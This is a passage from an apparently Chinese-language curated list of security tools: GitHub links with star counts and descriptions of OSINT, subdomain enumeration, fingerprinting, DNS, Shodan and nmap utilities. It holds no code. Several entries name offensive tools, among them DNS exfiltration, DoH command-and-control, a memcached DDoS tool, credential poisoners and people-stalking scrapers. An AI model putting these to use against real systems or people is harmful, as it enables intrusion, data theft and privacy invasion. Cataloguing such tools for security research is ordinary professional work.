侦查(reconnaissance)过程自动化脚本, 可自动使用Sublist3r/certspotter获取子域名, 调用nmap/dirsearch等 - [**778**星][1y] [HTML] [sense-of-security/adrecon](https://github.com/sense-of-security/adrecon) 收集Active Directory信息并生成报告 - [**758**星][2m] [Py] [khast3x/h8mail](https://github.com/khast3x/h8mail) Password Breach Hunting and Email OSINT tool, locally or using premium services. Supports chasing down related email - [**754**星][4m] [Py] [threatexpress/domainhunter](https://github.com/threatexpress/domainhunter) Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names - 重复区段: [社工(SET)->工具->未分类-SET](#ce734598055ad3885d45d0b35d2bf0d7) | - [**706**星][21d] [Ruby] [intrigueio/intrigue-core](https://github.com/intrigueio/intrigue-core) 外部攻击面发现框架,自动化OSINT - [**625**星][5m] [Py] [deibit/cansina](https://github.com/deibit/cansina) web 内容发现工具。发出各种请求并过滤回复,识别是否存在请求的资源。 - [**595**星][2m] [Py] [1n3/blackwidow](https://github.com/1n3/blackwidow) A Python based web application scanner to gather OSINT and fuzz for OWASP vulnerabilities on a target website. - [**582**星][8m] [Py] [ekultek/zeus-scanner](https://github.com/ekultek/zeus-scanner) Advanced reconnaissance utility - [**561**星][1m] [Py] [m4ll0k/infoga](https://github.com/m4ll0k/infoga) 邮件信息收集工具 - [**516**星][1m] [no-github/digital-privacy](https://github.com/no-github/digital-privacy) 一个关于数字隐私搜集、保护、清理集一体的方案,外加开源信息收集(OSINT)对抗 - [**492**星][29d] [Rust] [kpcyrd/sn0int](https://github.com/kpcyrd/sn0int) Semi-automatic OSINT framework and package manager - [**475**星][4m] [Py] [xillwillx/skiptracer](https://github.com/xillwillx/skiptracer) OSINT python webscaping framework - [**442**星][3m] [Py] [superhedgy/attacksurfacemapper](https://github.com/superhedgy/attacksurfacemapper) AttackSurfaceMapper is a tool that aims to automate the reconnaissance process. - [**422**星][1y] [JS] [ciscocsirt/gosint](https://github.com/ciscocsirt/gosint) 收集、处理、索引高质量IOC的框架 - [**411**星][5m] [Shell] [d4rk007/redghost](https://github.com/d4rk007/redghost) Linux post exploitation framework written in bash designed to assist red teams in persistence, reconnaissance, privilege escalation and leaving no trace. - [**409**星][3m] [ph055a/osint-collection](https://github.com/ph055a/osint-collection) Maintained collection of OSINT related resources. (All Free & Actionable) - [**397**星][5d] [Go] [graniet/operative-framework](https://github.com/graniet/operative-framework) operative framework is a OSINT investigation framework, you can interact with multiple targets, execute multiple modules, create links with target, export rapport to PDF file, add note to target or results, interact with RESTFul API, write your own modules. - [**392**星][1y] [Py] [chrismaddalena/odin](https://github.com/chrismaddalena/odin) Automated network asset, email, and social media profile discovery and cataloguing. - [**383**星][2m] [Py] [dedsecinside/torbot](https://github.com/dedsecinside/torbot) Dark Web OSINT Tool - [**354**星][12m] [Py] [aancw/belati](https://github.com/aancw/belati) The Traditional Swiss Army Knife for OSINT - [**353**星][18d] [Py] [depthsecurity/armory](https://github.com/depthsecurity/armory) Armory is a tool meant to take in a lot of external and discovery data from a lot of tools, add it to a database and correlate all of related information. - [**344**星][16d] [Py] [darryllane/bluto](https://github.com/darryllane/bluto) DNS Recon | Brute Forcer | DNS Zone Transfer | DNS Wild Card Checks | DNS Wild Card Brute Forcer | Email Enumeration | Staff Enumeration | Compromised Account Checking - [**336**星][12m] [Py] [mdsecactivebreach/linkedint](https://github.com/mdsecactivebreach/linkedint) A LinkedIn scraper for reconnaissance during adversary simulation - [**329**星][6m] [Go] [nhoya/gosint](https://github.com/nhoya/gosint) OSINT Swiss Army Knife - [**328**星][17d] [Py] [initstring/linkedin2username](https://github.com/initstring/linkedin2username) Generate username lists for companies on LinkedIn - [**314**星][] [Py] [sharadkumar97/osint-spy](https://github.com/sharadkumar97/osint-spy) Performs OSINT scan on email/domain/ip_address/organization using OSINT-SPY. It can be used by Data Miners, Infosec Researchers, Penetration Testers and cyber crime investigator in order to find deep information about their target. If you want to ask something please feel free to reach out to me at [email protected] - [**313**星][1y] [Py] [twelvesec/gasmask](https://github.com/twelvesec/gasmask) Information gathering tool - OSINT - [**307**星][1y] [Py] [r3vn/badkarma](https://github.com/r3vn/badkarma) network reconnaissance toolkit - [**297**星][7m] [Shell] [eschultze/urlextractor](https://github.com/eschultze/urlextractor) Information gathering & website reconnaissance | - [**292**星][3m] [JS] [pownjs/pown-recon](https://github.com/pownjs/pown-recon) A powerful target reconnaissance framework powered by graph theory. - [**286**星][1y] [Shell] [ha71/namechk](https://github.com/ha71/namechk) Osint tool based on namechk.com for checking usernames on more than 100 websites, forums and social networks. - [**285**星][23d] [Py] [ekultek/whatbreach](https://github.com/ekultek/whatbreach) OSINT tool to find breached emails, databases, pastes, and relevant information - [**269**星][1y] [Go] [tomsteele/blacksheepwall](https://github.com/tomsteele/blacksheepwall) blacksheepwall is a hostname reconnaissance tool - [**259**星][4m] [Py] [thewhiteh4t/finalrecon](https://github.com/thewhiteh4t/finalrecon) OSINT Tool for All-In-One Web Reconnaissance - [**258**星][3m] [Shell] [solomonsklash/chomp-scan](https://github.com/solomonsklash/chomp-scan) A scripted pipeline of tools to streamline the bug bounty/penetration test reconnaissance phase, so you can focus on chomping bugs. - [**257**星][8d] [TS] [ninoseki/mitaka](https://github.com/ninoseki/mitaka) A browser extension for OSINT search - [**253**星][26d] [Py] [zephrfish/googd0rker](https://github.com/zephrfish/googd0rker) GoogD0rker is a tool for firing off google dorks against a target domain, it is purely for OSINT against a specific target domain. READ the readme before messaging or tweeting me. - [**243**星][2m] [Py] [sc1341/instagramosint](https://github.com/sc1341/instagramosint) An Instagram Open Source Intelligence Tool - [**236**星][7m] [JS] [cliqz-oss/local-sheriff](https://github.com/cliqz-oss/local-sheriff) Think of Local sheriff as a recon tool in your browser (WebExtension). While you normally browse the internet, Local Sheriff works in the background to empower you in identifying what data points (PII) are being shared / leaked to which all third-parties. - [**233**星][2m] [Propeller Spin] [grandideastudio/jtagulator](https://github.com/grandideastudio/jtagulator) Assisted discovery of on-chip debug interfaces - [**229**星][2m] [Py] [anon-exploiter/sitebroker](https://github.com/anon-exploiter/sitebroker) A cross-platform python based utility for information gathering and penetration testing automation! - [**226**星][5d] [Py] [eth0izzle/the-endorser](https://github.com/eth0izzle/the-endorser) An OSINT tool that allows you to draw out relationships between people on LinkedIn via endorsements/skills. - [**223**星][1y] [Shell] [edoverflow/megplus](https://github.com/edoverflow/megplus) Automated reconnaissance wrapper — TomNomNom's meg on steroids. [DEPRECATED] - [**222**星][1m] [PS] [tonyphipps/meerkat](https://github.com/tonyphipps/meerkat) A collection of PowerShell modules designed for artifact gathering and reconnaisance of Windows-based endpoints. - [**220**星][9d] [Shell] [x1mdev/reconpi](https://github.com/x1mdev/reconpi) ReconPi - A lightweight recon tool that performs extensive scanning with the latest tools. - [**217**星][5m] [Py] [spiderlabs/hosthunter](https://github.com/spiderlabs/hosthunter) HostHunter a recon tool for discovering hostnames using OSINT techniques. - [**211**星][2m] [Py] [inquest/omnibus](https://github.com/inquest/omnibus) The OSINT Omnibus (beta release) - [**201**星][4m] [Py] [sham00n/buster](https://github.com/sham00n/buster) An advanced tool for email reconnaissance ### <a id="e945721056c78a53003e01c3d2f3b8fe"></a>子域名枚举&&爆破 - [**4153**星][2m] [Py] [aboul3la/sublist3r](https://github.com/aboul3la/sublist3r) Fast subdomains enumeration tool for penetration testers - [**3270**星][27d] [Py] [laramies/theharvester](https://github.com/laramies/theharvester) E-mails, subdomains and names Harvester - OSINT - [**3102**星][7m] [Go] [michenriksen/aquatone](https://github.com/michenriksen/aquatone) 子域名枚举工具。除了经典的爆破枚举之外,还利用多种开源工具和在线服务大幅度增加发现子域名的数量。 - [**2028**星][8d] [Go] [projectdiscovery/subfinder](https://github.com/projectdiscovery/subfinder) 使用Passive Sources, Search Engines, Pastebins, Internet Archives等查找子域名 - [**1808**星][7m] [Py] [lijiejie/subdomainsbrute](https://github.com/lijiejie/subdomainsbrute) 子域名爆破 - [**1716**星][8m] [Py] [guelfoweb/knock](https://github.com/guelfoweb/knock) 使用 Wordlist 枚举子域名 - [**1561**星][11d] [Go] [caffix/amass](https://github.com/caffix/amass) 子域名枚举, 搜索互联网数据源, 使用机器学习猜测子域名. Go语言 - [**1115**星][2m] [Py] [john-kurkowski/tldextract](https://github.com/john-kurkowski/tldextract) Accurately separate the TLD from the registered domain and subdomains of a URL, using the Public Suffix List. - [**990**星][6d] [Py] [shmilylty/oneforall](https://github.com/shmilylty/oneforall) 子域收集工具 - [**823**星][8d] [Rust] [edu4rdshl/findomain](https://github.com/edu4rdshl/findomain) The fastest and cross-platform subdomain enumerator, don't waste your time. - [**773**星][5m] [Go] [haccer/subjack](https://github.com/haccer/subjack) 异步多线程扫描子域列表,识别能够被劫持的子域。Go 编写 - [**649**星][1y] [Py] [simplysecurity/simplyemail](https://github.com/SimplySecurity/SimplyEmail) Email recon made fast and easy, with a framework to build on - [**575**星][3m] [Py] [jonluca/anubis](https://github.com/jonluca/anubis) Subdomain enumeration and information gathering tool - [**553**星][9m] [Py] [feeicn/esd](https://github.com/feeicn/esd) Enumeration sub domains(枚举子域名) - [**499**星][3m] [Py] [yanxiu0614/subdomain3](https://github.com/yanxiu0614/subdomain3) 简单快速的子域名爆破工具。 - [**498**星][27d] [Py] [typeerror/domained](https://github.com/TypeError/domained) Multi Tool Subdomain Enumeration - [**479**星][6m] [Py] [threezh1/jsfinder](https://github.com/threezh1/jsfinder) JSFinder is a tool for quickly extracting URLs and subdomains from JS files on a website. - [**454**星][25d] [Py] [nsonaniya2010/subdomainizer](https://github.com/nsonaniya2010/subdomainizer) A tool to find subdomains and interesting things hidden inside, external Javascript files of page, folder, and Github. - [**445**星][1y] [Go] [ice3man543/subover](https://github.com/ice3man543/subover) A Powerful Subdomain Takeover Tool - [**432**星][11m] [Py] [appsecco/bugcrowd-levelup-subdomain-enumeration](https://github.com/appsecco/bugcrowd-levelup-subdomain-enumeration) This repository contains all the material from the talk "Esoteric sub-domain enumeration techniques" given at Bugcrowd LevelUp 2017 virtual conference - [**334**星][5m] [Py] [chris408/ct-exposer](https://github.com/chris408/ct-exposer) An OSINT tool that discovers sub-domains by searching Certificate Transparency logs - [**332**星][2m] [Go] [tomnomnom/assetfinder](https://github.com/tomnomnom/assetfinder) Find domains and subdomains related to a given domain - [**293**星][4d] [Go] [anshumanbh/tko-subs](https://github.com/anshumanbh/tko-subs) A tool that can help detect and takeover subdomains with dead DNS records - [**279**星][26d] [Py] [franccesco/getaltname](https://github.com/franccesco/getaltname) 直接从SSL证书中提取子域名或虚拟域名 - [**277**星][11m] [Py] [appsecco/the-art-of-subdomain-enumeration](https://github.com/appsecco/the-art-of-subdomain-enumeration) This repository contains all the supplement material for the book "The art of sub-domain enumeration" - [**228**星][2m] [Shell] [screetsec/sudomy](https://github.com/screetsec/sudomy) Sudomy is a subdomain enumeration tool, created using a bash script, to analyze domains and collect subdomains in fast and comprehensive way . Report output in HTML or CSV format ### <a id="375a8baa06f24de1b67398c1ac74ed24"></a>信息收集&&侦查&&Recon&&InfoGather - [**3603**星][11d] [Shell] [drwetter/testssl.sh](https://github.com/drwetter/testssl.sh) 检查服务器任意端口对 TLS/SSL 的支持、协议以及一些加密缺陷,命令行工具 - [**2489**星][1m] [Py] [smicallef/spiderfoot](https://github.com/smicallef/spiderfoot) 自动收集指定目标的信息:IP、域名、主机名、网络子网、ASN、邮件地址、用户名 - [**2021**星][7d] [Py] [j3ssie/osmedeus](https://github.com/j3ssie/osmedeus) Fully automated offensive security framework for reconnaissance and vulnerability scanning - [**1966**星][9m] [JS] [weichiachang/stacks-cli](https://github.com/weichiachang/stacks-cli) Check website stack from the terminal - [**1958**星][30d] [Go] [mpolden/echoip](https://github.com/mpolden/echoip) IP address lookup service - [**1651**星][1y] [Py] [evyatarmeged/raccoon](https://github.com/evyatarmeged/raccoon) 高性能的侦查和漏洞扫描工具 - [**1486**星][6m] [Py] [oros42/imsi-catcher](https://github.com/oros42/imsi-catcher) This program show you IMSI numbers of cellphones around you. - [**1305**星][1y] [Go] [evilsocket/xray](https://github.com/evilsocket/xray) 自动化执行一些信息收集、网络映射的初始化工作 - [**1154**星][23d] [C] [xroche/httrack](https://github.com/xroche/httrack) download a World Wide website from the Internet to a local directory, building recursively all directories, getting html, images, and other files from the server to your computer. - [**975**星][2m] [HTML] [n0tr00t/sreg](https://github.com/n0tr00t/sreg) 可对使用者通过输入email、phone、username的返回用户注册的所有互联网护照信息。 - [**923**星][3m] [Ruby] [weppos/whois](https://github.com/weppos/whois) An intelligent — pure Ruby — WHOIS client and parser. - [**860**星][11m] [Shell] [thelinuxchoice/userrecon](https://github.com/thelinuxchoice/userrecon) Find usernames across over 75 social networks - [**838**星][7d] [HTML] [rewardone/oscprepo](https://github.com/rewardone/oscprepo) A list of commands, scripts, resources, and more that I have gathered and attempted to consolidate for use as OSCP (and more) study material. Commands in 'Usefulcommands' Keepnote. Bookmarks and reading material in 'BookmarkList' Keepnote. Reconscan in scripts folder. - [**677**星][2m] [Py] [tib3rius/autorecon](https://github.com/tib3rius/autorecon) AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services. - [**512**星][10m] [Py] [fortynorthsecurity/just-metadata](https://github.com/FortyNorthSecurity/Just-Metadata) Just-Metadata is a tool that gathers and analyzes metadata about IP addresses. It attempts to find relationships between systems within a large dataset. - [**483**星][2m] [Py] [yassineaboukir/sublert](https://github.com/yassineaboukir/sublert) Sublert is a security and reconnaissance tool which leverages certificate transparency to automatically monitor new subdomains deployed by specific organizations and issued TLS/SSL certificate. - [**418**星][2m] [Py] [lanmaster53/recon-ng](https://github.com/lanmaster53/recon-ng) Open Source Intelligence gathering tool aimed at reducing the time spent harvesting information from open sources. - [**394**星][11m] [Swift] [ibm/mac-ibm-enrollment-app](https://github.com/ibm/mac-ibm-enrollment-app) The Mac@IBM enrollment app makes setting up macOS with Jamf Pro more intuitive for users and easier for IT. The application offers IT admins the ability to gather additional information about their users during setup, allows users to customize their enrollment by selecting apps or bundles of apps to install during setup, and provides users with … - [**362**星][2m] [Shell] [vitalysim/totalrecon](https://github.com/vitalysim/totalrecon) TotalRecon installs all the recon tools you need - [**361**星][5m] [C++] [wbenny/pdbex](https://github.com/wbenny/pdbex) pdbex is a utility for reconstructing structures and unions from the PDB into compilable C headers - [**307**星][5m] [PLpgSQL] [amachanic/sp_whoisactive](https://github.com/amachanic/sp_whoisactive) sp_whoisactive - [**300**星][18d] [Py] [govanguard/legion](https://github.com/govanguard/legion) Legion is an open source, easy-to-use, super-extensible and semi-automated network penetration testing tool that aids in discovery, reconnaissance and exploitation of information systems. - [**273**星][20d] [Rust] [nccgroup/dirble](https://github.com/nccgroup/dirble) Fast directory scanning and scraping tool - [**269**星][11m] [Py] [LaNMaSteR53/recon-ng](https://bitbucket.org/lanmaster53/recon-ng) - [**258**星][4d] [Java] [ripe-ncc/whois](https://github.com/ripe-ncc/whois) RIPE Database whois code repository - [**233**星][2m] [C] [elfmaster/libelfmaster](https://github.com/elfmaster/libelfmaster) Secure ELF parsing/loading library for forensics reconstruction of malware, and robust reverse engineering tools - [**200**星][2m] [Py] [tylous/vibe](https://github.com/tylous/vibe) A framework for stealthy domain reconnaissance ### <a id="016bb6bd00f1e0f8451f779fe09766db"></a>指纹&&Fingerprinting - [**9519**星][12d] [JS] [valve/fingerprintjs2](https://github.com/valve/fingerprintjs2) Modern & flexible browser fingerprinting library - [**4758**星][7m] [Py] [worldveil/dejavu](https://github.com/worldveil/dejavu) Audio fingerprinting and recognition in Python - [**3072**星][2m] [JS] [valve/fingerprintjs](https://github.com/valve/fingerprintjs) Anonymous browser fingerprint - [**1670**星][] [JS] [ghacksuserjs/ghacks-user.js](https://github.com/ghacksuserjs/ghacks-user.js) An ongoing comprehensive user.js template for configuring and hardening Firefox privacy, security and anti-fingerprinting - [**1618**星][10m] [C] [nmikhailov/validity90](https://github.com/nmikhailov/validity90) Reverse engineering of Validity/Synaptics 138a:0090, 138a:0094, 138a:0097, 06cb:0081, 06cb:009a fingerprint readers protocol - [**931**星][8m] [JS] [song-li/cross_browser](https://github.com/song-li/cross_browser) cross_browser_fingerprinting - [**831**星][1m] [Py] [salesforce/ja3](https://github.com/salesforce/ja3) SSL/TLS 客户端指纹,用于恶意代码检测 - [**380**星][2m] [Py] [0x4d31/fatt](https://github.com/0x4d31/fatt) FATT /fingerprintAllTheThings - a pyshark based script for extracting network metadata and fingerprints from pcap files and live network traffic - [**313**星][3m] [Py] [dpwe/audfprint](https://github.com/dpwe/audfprint) Landmark-based audio fingerprinting - [**312**星][4m] [Py] [salesforce/hassh](https://github.com/salesforce/hassh) HASSH is a network fingerprinting standard which can be used to identify specific Client and Server SSH implementations. The fingerprints can be easily stored, searched and shared in the form of a small MD5 fingerprint. - [**282**星][1y] [CSS] [w-digital-scanner/w11scan](https://github.com/w-digital-scanner/w11scan) 分布式WEB指纹识别平台 Distributed WEB fingerprint identification platform - [**245**星][3m] [C] [leebrotherston/tls-fingerprinting](https://github.com/leebrotherston/tls-fingerprinting) TLS Fingerprinting - [**223**星][25d] [GLSL] [westpointltd/tls_prober](https://github.com/westpointltd/tls_prober) A tool to fingerprint SSL/TLS servers - [**220**星][1y] [Py] [sensepost/spartan](https://github.com/sensepost/spartan) Frontpage and Sharepoint fingerprinting and attack tool. ### <a id="6ea9006a5325dd21d246359329a3ede2"></a>收集 - [**3868**星][1m] [jivoi/awesome-osint](https://github.com/jivoi/awesome-osint) OSINT资源收集 ### <a id="dc74ad2dd53aa8c8bf3a3097ad1f12b7"></a>社交网络 #### <a id="6d36e9623aadaf40085ef5af89c8d698"></a>其他-SocialNetwork - [**9767**星][4d] [Py] [sherlock-project/sherlock](https://github.com/sherlock-project/sherlock) Find Usernames Across Social Networks - [**2578**星][3m] [Py] [greenwolf/social_mapper](https://github.com/Greenwolf/social_mapper) 对多个社交网站的用户Profile图片进行大规模的人脸识别 - [**1131**星][3m] [Py] [thoughtfuldev/eagleeye](https://github.com/thoughtfuldev/eagleeye) Stalk your Friends. Find their Instagram, FB and Twitter Profiles using Image Recognition and Reverse Image Search. - [**664**星][1y] [Go] [0x09al/raven](https://github.com/0x09al/raven) raven is a Linkedin information gathering tool that can be used by pentesters to gather information about an organization employees using Linkedin. #### <a id="de93515e77c0ca100bbf92c83f82dc2a"></a>Twitter - [**3033**星][4d] [Py] [twintproject/twint](https://github.com/twintproject/twint) An advanced Twitter scraping & OSINT tool written in Python that doesn't use Twitter's API, allowing you to scrape a user's followers, following, Tweets and more while evading most API limitations. #### <a id="8d1ae776898748b8249132e822f6c919"></a>Github - [**1717**星][2m] [Go] [eth0izzle/shhgit](https://github.com/eth0izzle/shhgit) 监听Github Event API,实时查找Github代码和Gist中的secret和敏感文件 - [**1636**星][2m] [Shell] [internetwache/gittools](https://github.com/internetwache/gittools) find websites with their .git repository available to the public - [**1563**星][1y] [Py] [unkl4b/gitminer](https://github.com/unkl4b/gitminer) Github内容挖掘 - [**1352**星][7m] [Py] [feeicn/gsil](https://github.com/feeicn/gsil) GitHub敏感信息泄露监控,几乎实时监控,发送警告 - [**859**星][2m] [JS] [vksrc/github-monitor](https://github.com/vksrc/github-monitor) Github Sensitive Information Leakage Monitor(Github信息泄漏监控系统) - [**857**星][7m] [Go] [misecurity/x-patrol](https://github.com/misecurity/x-patrol) github泄露扫描系统 - [**810**星][4m] [Py] [techgaun/github-dorks](https://github.com/techgaun/github-dorks) 快速搜索Github repo中的敏感信息 - [**789**星][2m] [Py] [bishopfox/gitgot](https://github.com/bishopfox/gitgot) Semi-automated, feedback-driven tool to rapidly search through troves of public data on GitHub for sensitive secrets. - [**667**星][3m] [Py] [hisxo/gitgraber](https://github.com/hisxo/gitgraber) monitor GitHub to search and find sensitive data in real time for different online services such as: Google, Amazon, Paypal, Github, Mailgun, Facebook, Twitter, Heroku, Stripe... - [**324**星][4d] [HTML] [tanjiti/sec_profile](https://github.com/tanjiti/sec_profile) 爬取secwiki和xuanwu.github.io/sec.today,分析安全信息站点、安全趋势、提取安全工作者账号(twitter,weixin,github等) - 重复区段: [扫描器->工具->隐私](#58d8b993ffc34f7ded7f4a0077129eb2) | - [**294**星][8m] [Py] [s0md3v/zen](https://github.com/s0md3v/zen) 查找Github用户的邮箱地址 ### <a id="a695111d8e30d645354c414cb27b7843"></a>DNS - [**2562**星][5m] [Go] [oj/gobuster](https://github.com/oj/gobuster) Directory/File, DNS and VHost busting tool written in Go - [**2380**星][2m] [Py] [ab77/netflix-proxy](https://github.com/ab77/netflix-proxy) Smart DNS proxy to watch Netflix - [**2131**星][2m] [Py] [elceef/dnstwist](https://github.com/elceef/dnstwist) 域名置换引擎,用于检测打字错误,网络钓鱼和企业间谍活动 - 重复区段: [社工(SET)->工具->钓鱼](#290e9ae48108d21d6d8b9ea9e74d077d) | - [**1933**星][7d] [C++] [powerdns/pdns](https://github.com/powerdns/pdns) PowerDNS - [**1735**星][4m] [Py] [lgandx/responder](https://github.com/lgandx/responder) Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. - [**1144**星][16d] [Py] [darkoperator/dnsrecon](https://github.com/darkoperator/dnsrecon) DNS 枚举脚本 - [**1090**星][1m] [Go] [looterz/grimd](https://github.com/looterz/grimd) Fast dns proxy that can run anywhere, built to black-hole internet advertisements and malware servers. - [**1090**星][2m] [Go] [nadoo/glider](https://github.com/nadoo/glider) 正向代理,支持若干协议 - [**1078**星][3m] [Py] [infosec-au/altdns](https://github.com/infosec-au/altdns) Generates permutations, alterations and mutations of subdomains and then resolves them - [**977**星][7m] [Py] [m57/dnsteal](https://github.com/m57/dnsteal) DNS Exfiltration tool for stealthily sending files over DNS requests. - [**912**星][5m] [Py] [m0rtem/cloudfail](https://github.com/m0rtem/cloudfail) 通过错误配置的DNS和老数据库,发现CloudFlare网络后面的隐藏IP - [**908**星][30d] [Py] [mschwager/fierce](https://github.com/mschwager/fierce) A DNS reconnaissance tool for locating non-contiguous IP space. - [**708**星][1y] [Py] [bugscanteam/dnslog](https://github.com/bugscanteam/dnslog) 监控 DNS 解析记录和 HTTP 访问记录 - [**613**星][8m] [Shell] [cokebar/gfwlist2dnsmasq](https://github.com/cokebar/gfwlist2dnsmasq) A shell script which convert gfwlist into dnsmasq rules. Python version: - [**585**星][2m] [C] [getdnsapi/stubby](https://github.com/getdnsapi/stubby) Stubby is the name given to a mode of using getdns which enables it to act as a local DNS Privacy stub resolver (using DNS-over-TLS). - [**461**星][9m] [C] [cofyc/dnscrypt-wrapper](https://github.com/cofyc/dnscrypt-wrapper) This is dnscrypt wrapper (server-side dnscrypt proxy), which helps to add dnscrypt support to any name resolver. - [**415**星][6m] [Py] [dnsviz/dnsviz](https://github.com/dnsviz/dnsviz) s a tool suite for analysis and visualization of Domain Name System (DNS) behavior, including its security extensions (DNSSEC) - [**375**星][1m] [JS] [nccgroup/singularity](https://github.com/nccgroup/singularity) A DNS rebinding attack framework. - [**355**星][1y] [Py] [i3visio/osrframework](https://github.com/i3visio/osrframework) 开源研究框架,提供 API 和工具执行更加精确的在线研究,例如用户名检查、DNS lookup、信息泄露研究、深度 web 研究、正则表达式提取等。 - [**336**星][5m] [Py] [rbsec/dnscan](https://github.com/rbsec/dnscan) a python wordlist-based DNS subdomain scanner. - [**267**星][1y] [Py] [trycatchhcf/packetwhisper](https://github.com/trycatchhcf/packetwhisper) Stealthily exfiltrate data and defeat attribution using DNS queries and text-based steganography. Avoid the problems associated with typical DNS exfiltration methods. Transfer data between systems without the communicating devices directly connecting to each other or to a common endpoint. No need to control a DNS Name Server. - [**265**星][2m] [Go] [sensepost/godoh](https://github.com/sensepost/godoh) A DNS-over-HTTPS Command & Control Proof of Concept - [**263**星][3m] [Go] [zmap/zdns](https://github.com/zmap/zdns) 快速DNS查找, 命令行工具 - [**258**星][7d] [Go] [erbbysam/dnsgrep](https://github.com/erbbysam/dnsgrep) Quickly Search Large DNS Datasets - [**256**星][3m] [Py] [qunarcorp/open_dnsdb](https://github.com/qunarcorp/open_dnsdb) OpenDnsdb 是去哪儿网OPS团队开源的基于Python语言的DNS管理系统 - [**252**星][8m] [Py] [dirkjanm/adidnsdump](https://github.com/dirkjanm/adidnsdump) Active Directory Integrated DNS dumping by any authenticated user - [**251**星][4m] [C#] [kevin-robertson/inveighzero](https://github.com/kevin-robertson/inveighzero) Windows C# LLMNR/mDNS/NBNS/DNS spoofer/man-in-the-middle tool - [**241**星][23d] [Py] [mandatoryprogrammer/trusttrees](https://github.com/mandatoryprogrammer/trusttrees) a script to recursively follow all the possible delegation paths for a target domain and graph the relationships between various nameservers along the way. ### <a id="18c7c1df2e6ae5e9135dfa2e4eb1d4db"></a>Shodan - [**1214**星][8d] [Py] [achillean/shodan-python](https://github.com/achillean/shodan-python) The official Python library for Shodan - [**1052**星][5m] [Py] [woj-ciech/kamerka](https://github.com/woj-ciech/kamerka) 利用Shodan构建交互式摄像头地图 - [**890**星][3m] [jakejarvis/awesome-shodan-queries](https://github.com/jakejarvis/awesome-shodan-queries) - [**858**星][3m] [Py] [649/memcrashed-ddos-exploit](https://github.com/649/memcrashed-ddos-exploit) DDoS attack tool for sending forged UDP packets to vulnerable Memcached servers obtained using Shodan API - 重复区段: [渗透->工具->DDOS](#a0897294e74a0863ea8b83d11994fad6) | - [**391**星][3d] [Py] [random-robbie/my-shodan-scripts](https://github.com/random-robbie/my-shodan-scripts) Collection of Scripts for shodan searching stuff. - [**378**星][2m] [Py] [pielco11/fav-up](https://github.com/pielco11/fav-up) IP lookup from favicon using Shodan - [**234**星][11m] [Py] [nethunteros/punter](https://github.com/nethunteros/punter) 使用 DNSDumpster, WHOIS, Reverse WHOIS 挖掘域名 - [**220**星][6d] [Py] [shodansploit/shodansploit](https://github.com/shodansploit/shodansploit) ### <a id="94c01f488096fafc194b9a07f065594c"></a>nmap - [**3609**星][7d] [C] [nmap/nmap](https://github.com/nmap/nmap) Nmap - [**2116**星][7m] [Py] [calebmadrigal/trackerjacker](https://github.com/calebmadrigal/trackerjacker) 映射你没连接到的Wifi网络, 类似于NMap, 另外可以追踪设备 - [**1871**星][20d] [Lua] [vulnerscom/nmap-vulners](https://github.com/vulnerscom/nmap-vulners) NSE script based on Vulners.com API - [**1536**星][5d] [C++] [nmap/npcap](https://github.com/nmap/npcap) Nmap项目的针对Windows系统的数据包嗅探库,基于WinPcap/Libpcap,用NDIS6和LWF做了升级 - [**1317**星][3m] [Lua] [scipag/vulscan](https://github.com/scipag/vulscan) Nmap 模块,将 Nmap 转化为高级漏洞扫描器 - [**1029**星][1m] [Shell] [trimstray/sandmap](https://github.com/trimstray/sandmap) 使用NMap引擎, 辅助网络和系统侦查(reconnaissance) - [**887**星][12m] [Py] [rev3rsesecurity/webmap](https://github.com/rev3rsesecurity/webmap) Nmap Web Dashboard and Reporting - [**849**星][5d] [Py] [x90skysn3k/brutespray](https://github.com/x90skysn3k/brutespray) 获取 nmapGNMAP 输出,自动调用 Medusa 使用默认证书爆破服务(brute-forces services) - [**733**星][5m] [Lua] [cldrn/nmap-nse-scripts](https://github.com/cldrn/nmap-nse-scripts) My collection of nmap NSE scripts - [**696**星][2m] [Py] [iceyhexman/onlinetools](https://github.com/iceyhexman/onlinetools) 在线cms识别|信息泄露|工控|系统|物联网安全|cms漏洞扫描|nmap端口扫描|子域名获取|待续.. - [**503**星][1y] [XSLT] [honze-net/nmap-bootstrap-xsl](https://github.com/honze-net/nmap-bootstrap-xsl) A Nmap XSL implementation with Bootstrap. - [**394**星][8m] [Py] [savon-noir/python-libnmap](https://github.com/savon-noir/python-libnmap) libnmap is a python library to run nmap scans, parse and diff scan results. It supports python 2.6 up to 3.4. It's wonderful. - [**328**星][10m] [Py] [samhaxr/hackbox](https://github.com/samhaxr/hackbox) 集合了某些Hacking工具和技巧的攻击工具 - [**308**星][1y] [Java] [s4n7h0/halcyon](https://github.com/s4n7h0/halcyon) First IDE for Nmap Script (NSE) Development. - [**283**星][1y] [Ruby] [danmcinerney/pentest-machine](https://github.com/danmcinerney/pentest-machine) Automates some pentest jobs via nmap xml file - [**261**星][1y] [Shell] [m4ll0k/autonse](https://github.com/m4ll0k/autonse) Massive NSE (Nmap Scripting Engine) AutoSploit and AutoScanner - [**257**星][1y] [Java] [danicuestasuarez/nmapgui](https://github.com/danicuestasuarez/nmapgui) Advanced Graphical User Interface for NMap - [**246**星][8m] [Lua] [rvn0xsy/nse_vuln](https://github.com/rvn0xsy/nse_vuln) Nmap扫描、漏洞利用脚本 - [**233**星][6m] [Py] [maaaaz/nmaptocsv](https://github.com/maaaaz/nmaptocsv) A simple python script to convert Nmap output to CSV - [**223**星][12d] [Py] [rackerlabs/scantron](https://github.com/rackerlabs/scantron) A distributed nmap / masscan scanning framework - [**204**星][6m] [Py] [hellogoldsnakeman/masnmapscan-v1.0](https://github.com/hellogoldsnakeman/masnmapscan-v1.0) 一款端口扫描器。整合了masscan和nmap两款扫描器,masscan扫描端口,nmap扫描端口对应服务,二者结合起来实现了又快又好地扫描。并且加入了防火墙的功能 *** ## <a id="b0ca6c8512a268e8438d5e5247a88c2f"></a>文章 ### <a id="5a855113503106950acff4d7dbb2403e"></a>新添加 # <a id="546f4fe70faa2236c0fbc2d486a83391"></a>社工(SET)&&钓鱼&&鱼叉攻击 *** ## <a id="3e622bff3199cf22fe89db026b765cd4"></a>工具 ### <a id="ce734598055ad3885d45d0b35d2bf0d7"></a>未分类-SET - [**1363**星][2m] [CSS] [undeadsec/socialfish](https://github.com/undeadsec/socialfish) 网络钓鱼培训与信息收集 - 重复区段: 